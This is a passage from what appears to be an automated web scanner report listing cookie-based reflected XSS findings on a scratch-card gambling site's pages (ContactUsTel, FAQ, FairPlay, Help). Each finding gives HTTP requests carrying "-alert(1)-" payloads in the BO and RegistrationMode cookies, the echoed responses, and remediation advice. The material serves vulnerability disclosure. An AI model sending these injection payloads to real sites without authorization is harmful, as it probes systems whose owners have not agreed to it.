Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; LanguageCode=ENG; RegistrationMode=PMd4ff8"-alert(1)-"b6010eeb282; BO=FM; CSI_12=EncryptedUniqueVisitorID=221D36A4955B6C06841250648788A96C&AffiliateID=12&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CountryCode=US; CSITemp=12; ASP.NET_SessionId=d1so5b551ijeobbe4bfxso45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:07:22 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PMd4ff8"-alert(1)-"b6010eeb282; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:07:22 GMT; path=/
Set-Cookie: BO=FM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:07:22 GMT; path=/
Set-Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:07:22 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:07:22 GMT; path=/
Set-Cookie: CountryCode=US; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:07:22 GMT; path=/
Set-Cookie: CSITemp=12; domain=bigmoneyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 54327


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PMd4ff8"-alert(1)-"b6010eeb282";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.207. http://www.bigmoneyscratch.com/ContactUsTel.aspx [BO cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bigmoneyscratch.com
Path:   /ContactUsTel.aspx

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e206d"-alert(1)-"b6e9e7a7d18 was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user: an attacker first needs a way to set the BO cookie in the victim's browser, for example through a separate flaw on any host able to set cookies for bigmoneyscratch.com, the domain the cookie is scoped to. That requirement considerably mitigates the impact. Note, however, that the response below re-issues the cookie with the injected value intact (Set-Cookie: BO=FMe206d"-alert(1)-"b6e9e7a7d18; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 ...), so a value planted once is sent back, and the injected script re-executed, on every page that renders this script for the next three years unless the cookie is cleared.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Where the value must be emitted, it should be written as a JavaScript string literal with every character outside a conservative allow-list (alphanumerics, for example) encoded as \xHH or \uHHHH, so that ", \, </ and line terminators cannot end the literal or the script element. HTML entity encoding is the wrong encoder for this context: it alters the value and leaves backslashes and line terminators untouched. On .NET 4.0 and later HttpUtility.JavaScriptStringEncode performs this encoding; the 2.0 runtime reported in X-AspNet-Version has no built-in equivalent, so a dedicated encoder is needed. Independently, the BO cookie should be validated against the short codes the application actually expects (FM here) before it is used at all.

Request

GET /ContactUsTel.aspx HTTP/1.1
Host: www.bigmoneyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; LanguageCode=ENG; RegistrationMode=PM; BO=FMe206d"-alert(1)-"b6e9e7a7d18; CSI_12=EncryptedUniqueVisitorID=221D36A4955B6C06841250648788A96C&AffiliateID=12&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CountryCode=US; CSITemp=12; ASP.NET_SessionId=d1so5b551ijeobbe4bfxso45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:07:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:07:13 GMT; path=/
Set-Cookie: BO=FMe206d"-alert(1)-"b6e9e7a7d18; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:07:13 GMT; path=/
Set-Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:07:13 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:07:13 GMT; path=/
Set-Cookie: CountryCode=US; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:07:13 GMT; path=/
Set-Cookie: CSITemp=12; domain=bigmoneyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 46549


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FMe206d"-alert(1)-"b6e9e7a7d18";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.208. http://www.bigmoneyscratch.com/ContactUsTel.aspx [RegistrationMode cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bigmoneyscratch.com
Path:   /ContactUsTel.aspx

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cf7c1"-alert(1)-"b48b5658b40 was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user: an attacker first needs a way to set the RegistrationMode cookie in the victim's browser, for example through a separate flaw on any host able to set cookies for bigmoneyscratch.com, the domain the cookie is scoped to. That requirement considerably mitigates the impact. Note, however, that the response below re-issues the cookie with the injected value intact (Set-Cookie: RegistrationMode=PMcf7c1"-alert(1)-"b48b5658b40; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 ...), so a value planted once is sent back, and the injected script re-executed, on every page that renders this script for the next three years unless the cookie is cleared.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Where the value must be emitted, it should be written as a JavaScript string literal with every character outside a conservative allow-list (alphanumerics, for example) encoded as \xHH or \uHHHH, so that ", \, </ and line terminators cannot end the literal or the script element. HTML entity encoding is the wrong encoder for this context: it alters the value and leaves backslashes and line terminators untouched. On .NET 4.0 and later HttpUtility.JavaScriptStringEncode performs this encoding; the 2.0 runtime reported in X-AspNet-Version has no built-in equivalent, so a dedicated encoder is needed. Independently, the RegistrationMode cookie should be validated against the short codes the application actually expects (PM here) before it is used at all.

Request

GET /ContactUsTel.aspx HTTP/1.1
Host: www.bigmoneyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; LanguageCode=ENG; RegistrationMode=PMcf7c1"-alert(1)-"b48b5658b40; BO=FM; CSI_12=EncryptedUniqueVisitorID=221D36A4955B6C06841250648788A96C&AffiliateID=12&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CountryCode=US; CSITemp=12; ASP.NET_SessionId=d1so5b551ijeobbe4bfxso45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:06:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PMcf7c1"-alert(1)-"b48b5658b40; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:06:55 GMT; path=/
Set-Cookie: BO=FM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:06:55 GMT; path=/
Set-Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:06:55 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:06:55 GMT; path=/
Set-Cookie: CountryCode=US; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:06:55 GMT; path=/
Set-Cookie: CSITemp=12; domain=bigmoneyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 46549


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PMcf7c1"-alert(1)-"b48b5658b40";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.209. http://www.bigmoneyscratch.com/FAQ.aspx [BO cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bigmoneyscratch.com
Path:   /FAQ.aspx

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 95447"-alert(1)-"1a57c958de9 was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user: an attacker first needs a way to set the BO cookie in the victim's browser, for example through a separate flaw on any host able to set cookies for bigmoneyscratch.com, the domain the cookie is scoped to. That requirement considerably mitigates the impact. Note, however, that the response below re-issues the cookie with the injected value intact (Set-Cookie: BO=FM95447"-alert(1)-"1a57c958de9; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 ...), so a value planted once is sent back, and the injected script re-executed, on every page that renders this script for the next three years unless the cookie is cleared.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Where the value must be emitted, it should be written as a JavaScript string literal with every character outside a conservative allow-list (alphanumerics, for example) encoded as \xHH or \uHHHH, so that ", \, </ and line terminators cannot end the literal or the script element. HTML entity encoding is the wrong encoder for this context: it alters the value and leaves backslashes and line terminators untouched. On .NET 4.0 and later HttpUtility.JavaScriptStringEncode performs this encoding; the 2.0 runtime reported in X-AspNet-Version has no built-in equivalent, so a dedicated encoder is needed. Independently, the BO cookie should be validated against the short codes the application actually expects (FM here) before it is used at all.

Request

GET /FAQ.aspx HTTP/1.1
Host: www.bigmoneyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; LanguageCode=ENG; RegistrationMode=PM; BO=FM95447"-alert(1)-"1a57c958de9; CSI_12=EncryptedUniqueVisitorID=221D36A4955B6C06841250648788A96C&AffiliateID=12&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CountryCode=US; CSITemp=12; ASP.NET_SessionId=d1so5b551ijeobbe4bfxso45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:08:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:08:48 GMT; path=/
Set-Cookie: BO=FM95447"-alert(1)-"1a57c958de9; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:08:48 GMT; path=/
Set-Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:08:48 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:08:48 GMT; path=/
Set-Cookie: CountryCode=US; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:08:48 GMT; path=/
Set-Cookie: CSITemp=12; domain=bigmoneyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 95046


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FM95447"-alert(1)-"1a57c958de9";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.210. http://www.bigmoneyscratch.com/FAQ.aspx [RegistrationMode cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bigmoneyscratch.com
Path:   /FAQ.aspx

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 310e5"-alert(1)-"56ed7a9f575 was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user: an attacker first needs a way to set the RegistrationMode cookie in the victim's browser, for example through a separate flaw on any host able to set cookies for bigmoneyscratch.com, the domain the cookie is scoped to. That requirement considerably mitigates the impact. Note, however, that the response below re-issues the cookie with the injected value intact (Set-Cookie: RegistrationMode=PM310e5"-alert(1)-"56ed7a9f575; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 ...), so a value planted once is sent back, and the injected script re-executed, on every page that renders this script for the next three years unless the cookie is cleared.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Where the value must be emitted, it should be written as a JavaScript string literal with every character outside a conservative allow-list (alphanumerics, for example) encoded as \xHH or \uHHHH, so that ", \, </ and line terminators cannot end the literal or the script element. HTML entity encoding is the wrong encoder for this context: it alters the value and leaves backslashes and line terminators untouched. On .NET 4.0 and later HttpUtility.JavaScriptStringEncode performs this encoding; the 2.0 runtime reported in X-AspNet-Version has no built-in equivalent, so a dedicated encoder is needed. Independently, the RegistrationMode cookie should be validated against the short codes the application actually expects (PM here) before it is used at all.

Request

GET /FAQ.aspx HTTP/1.1
Host: www.bigmoneyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; LanguageCode=ENG; RegistrationMode=PM310e5"-alert(1)-"56ed7a9f575; BO=FM; CSI_12=EncryptedUniqueVisitorID=221D36A4955B6C06841250648788A96C&AffiliateID=12&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CountryCode=US; CSITemp=12; ASP.NET_SessionId=d1so5b551ijeobbe4bfxso45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:08:12 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM310e5"-alert(1)-"56ed7a9f575; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:08:12 GMT; path=/
Set-Cookie: BO=FM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:08:12 GMT; path=/
Set-Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:08:12 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:08:12 GMT; path=/
Set-Cookie: CountryCode=US; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:08:12 GMT; path=/
Set-Cookie: CSITemp=12; domain=bigmoneyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 95046


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM310e5"-alert(1)-"56ed7a9f575";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.211. http://www.bigmoneyscratch.com/FairPlay.aspx [BO cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bigmoneyscratch.com
Path:   /FairPlay.aspx

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f934b"-alert(1)-"6a6d8ca2d08 was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /FairPlay.aspx HTTP/1.1
Host: www.bigmoneyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; LanguageCode=ENG; RegistrationMode=PM; BO=FMf934b"-alert(1)-"6a6d8ca2d08; CSI_12=EncryptedUniqueVisitorID=221D36A4955B6C06841250648788A96C&AffiliateID=12&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CountryCode=US; CSITemp=12; ASP.NET_SessionId=d1so5b551ijeobbe4bfxso45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:08:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:08:44 GMT; path=/
Set-Cookie: BO=FMf934b"-alert(1)-"6a6d8ca2d08; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:08:44 GMT; path=/
Set-Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:08:44 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:08:44 GMT; path=/
Set-Cookie: CountryCode=US; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:08:44 GMT; path=/
Set-Cookie: CSITemp=12; domain=bigmoneyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 47979


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FMf934b"-alert(1)-"6a6d8ca2d08";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.212. http://www.bigmoneyscratch.com/FairPlay.aspx [RegistrationMode cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bigmoneyscratch.com
Path:   /FairPlay.aspx

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 57b8e"-alert(1)-"d880c313d6c was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /FairPlay.aspx HTTP/1.1
Host: www.bigmoneyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; LanguageCode=ENG; RegistrationMode=PM57b8e"-alert(1)-"d880c313d6c; BO=FM; CSI_12=EncryptedUniqueVisitorID=221D36A4955B6C06841250648788A96C&AffiliateID=12&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CountryCode=US; CSITemp=12; ASP.NET_SessionId=d1so5b551ijeobbe4bfxso45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:08:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM57b8e"-alert(1)-"d880c313d6c; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:08:13 GMT; path=/
Set-Cookie: BO=FM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:08:13 GMT; path=/
Set-Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:08:13 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:08:13 GMT; path=/
Set-Cookie: CountryCode=US; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:08:13 GMT; path=/
Set-Cookie: CSITemp=12; domain=bigmoneyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 47979


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM57b8e"-alert(1)-"d880c313d6c";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.213. http://www.bigmoneyscratch.com/Help.aspx [BO cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bigmoneyscratch.com
Path:   /Help.aspx

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 185cc"-alert(1)-"130a72d91c was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Help.aspx HTTP/1.1
Host: www.bigmoneyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; LanguageCode=ENG; RegistrationMode=PM; BO=FM185cc"-alert(1)-"130a72d91c; CSI_12=EncryptedUniqueVisitorID=221D36A4955B6C06841250648788A96C&AffiliateID=12&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CountryCode=US; CSITemp=12; ASP.NET_SessionId=d1so5b551ijeobbe4bfxso45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:05:57 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:05:57 GMT; path=/
Set-Cookie: BO=FM185cc"-alert(1)-"130a72d91c; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:05:57 GMT; path=/
Set-Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:05:57 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:05:57 GMT; path=/
Set-Cookie: CountryCode=US; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:05:57 GMT; path=/
Set-Cookie: CSITemp=12; domain=bigmoneyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 47210


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FM185cc"-alert(1)-"130a72d91c";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.214. http://www.bigmoneyscratch.com/Help.aspx [RegistrationMode cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bigmoneyscratch.com
Path:   /Help.aspx

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a1333"-alert(1)-"964b23fefd3 was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Help.aspx HTTP/1.1
Host: www.bigmoneyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; LanguageCode=ENG; RegistrationMode=PMa1333"-alert(1)-"964b23fefd3; BO=FM; CSI_12=EncryptedUniqueVisitorID=221D36A4955B6C06841250648788A96C&AffiliateID=12&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CountryCode=US; CSITemp=12; ASP.NET_SessionId=d1so5b551ijeobbe4bfxso45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:05:39 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PMa1333"-alert(1)-"964b23fefd3; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:05:39 GMT; path=/
Set-Cookie: BO=FM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:05:39 GMT; path=/
Set-Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:05:39 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:05:39 GMT; path=/
Set-Cookie: CountryCode=US; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:05:39 GMT; path=/
Set-Cookie: CSITemp=12; domain=bigmoneyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 47211


